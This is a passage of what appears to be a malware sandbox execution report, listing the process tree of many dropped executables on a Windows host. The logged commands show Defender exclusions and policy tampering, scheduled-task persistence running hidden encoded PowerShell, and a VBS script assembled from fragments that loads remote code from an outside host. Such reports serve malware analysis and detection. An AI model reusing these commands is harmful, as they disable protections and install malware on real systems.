        schtasks /CREATE /TN "gACeBZnFj" /SC once /ST 00:56:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:5772
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gACeBZnFj"
        6⤵
        
        PID:6340
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gACeBZnFj"
        6⤵
        
        PID:5748
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bIuqmGYQGJDamXyoTV" /SC once /ST 01:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kBxxCRZNHvjAGpesg\GPTqPnNFuTbVPXl\jMXoYrK.exe\" gS /Hpsite_idwNw 385121 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:9596
- - C:\Users\Admin\Pictures\2l34NMazNd7zMOVG0xy4akam.exe
    "C:\Users\Admin\Pictures\2l34NMazNd7zMOVG0xy4akam.exe"
    3⤵
    PID:7748
- - C:\Users\Admin\Pictures\yC4xNXrQzLs6kLw3whK71V5z.exe
    "C:\Users\Admin\Pictures\yC4xNXrQzLs6kLw3whK71V5z.exe"
    3⤵
    PID:8044
- - C:\Users\Admin\Pictures\eQuI9WwZEPpmf7hnolvrpgO7.exe
    "C:\Users\Admin\Pictures\eQuI9WwZEPpmf7hnolvrpgO7.exe"
    3⤵
    PID:5840
- - C:\Users\Admin\Pictures\rpIRc0yrd2w29qtOSSiTzL5i.exe
    "C:\Users\Admin\Pictures\rpIRc0yrd2w29qtOSSiTzL5i.exe" --silent --allusers=0
    3⤵
    PID:8024
  - - C:\Users\Admin\Pictures\rpIRc0yrd2w29qtOSSiTzL5i.exe
      C:\Users\Admin\Pictures\rpIRc0yrd2w29qtOSSiTzL5i.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x67f95648,0x67f95658,0x67f95664
      4⤵
      PID:7916
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\rpIRc0yrd2w29qtOSSiTzL5i.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\rpIRc0yrd2w29qtOSSiTzL5i.exe" --version
      4⤵
      PID:8484
- - C:\Users\Admin\Pictures\ru8TKrHJalDVviYd6QuqqtqX.exe
    "C:\Users\Admin\Pictures\ru8TKrHJalDVviYd6QuqqtqX.exe"
    3⤵
    PID:6740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5228
  - - C:\Users\Admin\Pictures\ru8TKrHJalDVviYd6QuqqtqX.exe
      "C:\Users\Admin\Pictures\ru8TKrHJalDVviYd6QuqqtqX.exe"
      4⤵
      PID:8828
- - C:\Users\Admin\Pictures\rE3BTm2MGFWeQBOHSddnyU9D.exe
    "C:\Users\Admin\Pictures\rE3BTm2MGFWeQBOHSddnyU9D.exe"
    3⤵
    PID:8020
  - - C:\Users\Admin\Pictures\rE3BTm2MGFWeQBOHSddnyU9D.exe
      "C:\Users\Admin\Pictures\rE3BTm2MGFWeQBOHSddnyU9D.exe"
      4⤵
      PID:8852
- C:\Users\Admin\AppData\Local\Temp\a\source2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\source2.exe"
  2⤵
  PID:7972
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:8432
- C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
  "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
  2⤵
  PID:8132
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IgNIppWS.exe"
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IgNIppWS" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3E62.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:7584
- - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
    3⤵
    PID:8244
- C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe
  "C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe"
  2⤵
  PID:8260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe
    3⤵
    PID:9112
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:2972
- C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe
  "C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe"
  2⤵
  PID:8724
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c difficspec.bat
    3⤵
    PID:9024
- - C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\difficultspecific.exe
    C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\difficultspecific.exe
    3⤵
    PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\callcustomerpro.exe
      C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\callcustomerpro.exe
      4⤵
      PID:5976
    - - C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\callcustomer.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\callcustomer.exe
        5⤵
        
        PID:1908
- C:\Users\Admin\AppData\Local\Temp\a\amday.exe
  "C:\Users\Admin\AppData\Local\Temp\a\amday.exe"
  2⤵
  PID:8332
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
    3⤵
    PID:5108
- C:\Users\Admin\AppData\Local\Temp\a\rengad.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rengad.exe"
  2⤵
  PID:8424
- C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe
  "C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe"
  2⤵
  PID:3604
- - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\towardlowestpro.exe
    C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\towardlowestpro.exe
    3⤵
    PID:4672
  - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\towardlowest.exe
      C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\towardlowest.exe
      4⤵
      PID:3140
- C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe"
  2⤵
  PID:8888
- C:\Users\Admin\AppData\Local\Temp\a\windows.exe
  "C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
  2⤵
  PID:5872
- C:\Users\Admin\AppData\Local\Temp\a\w-12.exe
  "C:\Users\Admin\AppData\Local\Temp\a\w-12.exe"
  2⤵
  PID:7448
- C:\Users\Admin\AppData\Local\Temp\a\netTimer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\netTimer.exe"
  2⤵
  PID:6608
- C:\Users\Admin\AppData\Local\Temp\a\Creal.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Creal.exe"
  2⤵
  PID:5432
- - C:\Users\Admin\AppData\Local\Temp\a\Creal.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Creal.exe"
    3⤵
    PID:9008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:3740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:6484
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:9040
- C:\Users\Admin\AppData\Local\Temp\a\1712.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
  2⤵
  PID:4332
- C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe"
  2⤵
  PID:8832
- C:\Users\Admin\AppData\Local\Temp\a\zoeg4a5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\zoeg4a5.exe"
  2⤵
  PID:6800
- C:\Users\Admin\AppData\Local\Temp\a\ss47.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ss47.exe"
  2⤵
  PID:5604
- C:\Users\Admin\AppData\Local\Temp\a\cllip.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cllip.exe"
  2⤵
  PID:4144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s374.0.bat" "
    3⤵
    PID:9012
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:8264
  - - C:\ProgramData\presepuesto\LEAJ.exe
      "C:\ProgramData\presepuesto\LEAJ.exe"
      4⤵
      PID:10204
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "LEAJ" /tr C:\ProgramData\presepuesto\LEAJ.exe /f
        5⤵
        Creates scheduled task(s)
        
        PID:6096
- C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
  2⤵
  PID:7700
- - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
    3⤵
    PID:3204
- - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
    3⤵
    PID:9928
- C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe"
  2⤵
  PID:6440
- - C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    3⤵
    PID:9288
- C:\Users\Admin\AppData\Local\Temp\a\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
  2⤵
  PID:1724
- C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe"
  2⤵
  PID:5628
- - C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe"
    3⤵
    PID:1184
- C:\Users\Admin\AppData\Local\Temp\a\HTML.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HTML.exe"
  2⤵
  PID:6212
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\movwXShFsgOqA" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDB68.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5508
- - C:\Users\Admin\AppData\Local\Temp\a\HTML.exe
    "{path}"
    3⤵
    PID:6756
- C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
  2⤵
  PID:9344
- C:\Users\Admin\AppData\Local\Temp\a\3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\3.exe"
  2⤵
  PID:9972
- C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
  2⤵
  PID:9252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:10192
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:6268
- C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  PID:9580
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 9580 -s 604
    3⤵
    - Program crash
    PID:10164
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  PID:7524
- C:\Users\Admin\AppData\Local\Temp\a\bin.exe
  "C:\Users\Admin\AppData\Local\Temp\a\bin.exe"
  2⤵
  PID:3388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:7336
- C:\Users\Admin\AppData\Local\Temp\a\i.exe
  "C:\Users\Admin\AppData\Local\Temp\a\i.exe"
  2⤵
  PID:9596
- C:\Users\Admin\AppData\Local\Temp\a\%40Natsu338_alice.exe
  "C:\Users\Admin\AppData\Local\Temp\a\%40Natsu338_alice.exe"
  2⤵
  PID:9660
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:6012
- C:\Users\Admin\AppData\Local\Temp\a\info.exe
  "C:\Users\Admin\AppData\Local\Temp\a\info.exe"
  2⤵
  PID:9428
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:1436
- C:\Users\Admin\AppData\Local\Temp\a\Msvsrlgkmzkynw.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Msvsrlgkmzkynw.exe"
  2⤵
  PID:5676
- C:\Users\Admin\AppData\Local\Temp\a\akjnagosfmwanr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\akjnagosfmwanr.exe"
  2⤵
  PID:6308
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6308 -s 1340
    3⤵
    - Program crash
    PID:9080
- C:\Users\Admin\AppData\Local\Temp\a\invoicedata.exe
  "C:\Users\Admin\AppData\Local\Temp\a\invoicedata.exe"
  2⤵
  PID:3204
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:7372
- - C:\Users\Admin\AppData\Local\Temp\ChromeClose12.exe
    "C:\Users\Admin\AppData\Local\Temp\ChromeClose12.exe"
    3⤵
    PID:6168
- C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
  "C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
  2⤵
  PID:6192
- C:\Users\Admin\AppData\Local\Temp\a\ed1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ed1.exe"
  2⤵
  PID:7692
- C:\Users\Admin\AppData\Local\Temp\a\information.exe
  "C:\Users\Admin\AppData\Local\Temp\a\information.exe"
  2⤵
  PID:1116
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:7648
- C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Cpp.exe
  "C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Cpp.exe"
  2⤵
  PID:2616
- C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe"
  2⤵
  PID:6156
- - C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
    "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
    3⤵
    PID:7656

C:\Users\Admin\AppData\Local\Temp\7zSE639.tmp\Install.exe
.\Install.exe /OUldidI "525403" /S
1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:1228
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
  2⤵
  PID:3820
- - C:\Windows\SysWOW64\cmd.exe
    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
    3⤵
    PID:4700
  - - \??\c:\windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
      4⤵
      PID:1320
  - - \??\c:\windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
      4⤵
      PID:1124
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\cmd.exe
    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
    3⤵
    PID:1460
  - - \??\c:\windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4360
  - - \??\c:\windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ggDAWTavZ" /SC once /ST 00:37:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4144
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "ggDAWTavZ"
  2⤵
  PID:2176
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ggDAWTavZ"
  2⤵
  PID:3764
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "bxtAGoPbMolunmAlli" /SC once /ST 01:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr\ifhEFYQnJPVQZSd\AjISanj.exe\" c8 /ybsite_idDcF 525403 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2884
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "bxtAGoPbMolunmAlli"
  2⤵
  PID:2188

\??\c:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Users\Public\bjk6l9.vbs
1⤵
PID:688
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs"
  2⤵
  PID:600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
1⤵
PID:4984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
1⤵
PID:1440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
1⤵
PID:520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
1⤵
PID:5116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4192
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4444

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4320

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5892

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\SysWOW64\wscript.exe"
1⤵
PID:4296
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
  2⤵
  PID:6984

C:\Users\Admin\AppData\Local\Temp\6BD.exe
C:\Users\Admin\AppData\Local\Temp\6BD.exe
1⤵
PID:6912
- C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\Si0fQ9YY.exe
  C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\Si0fQ9YY.exe
  2⤵
  PID:7040
- - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\rI1Jd4Eu.exe
    C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\rI1Jd4Eu.exe
    3⤵
    PID:2652
  - - C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\WF0kq6mf.exe
      C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\WF0kq6mf.exe
      4⤵
      PID:1952
    - - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\Bp2UD7lQ.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\Bp2UD7lQ.exe
        5⤵
        
        PID:6448
      - C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\1eH36Fz5.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\1eH36Fz5.exe
        6⤵
        
        PID:6628
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:7348
      - C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\2Et342Hh.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\2Et342Hh.exe
        6⤵
        
        PID:7828

C:\Users\Admin\AppData\Local\Temp\1BFB.exe
C:\Users\Admin\AppData\Local\Temp\1BFB.exe
1⤵
PID:6788

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\DBgNbna.exe
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\DBgNbna.exe 3Y /Fosite_idreW 385119 /S
1⤵
PID:6968

C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr\ifhEFYQnJPVQZSd\AjISanj.exe
C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr\ifhEFYQnJPVQZSd\AjISanj.exe c8 /ybsite_idDcF 525403 /S
1⤵
PID:7048
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 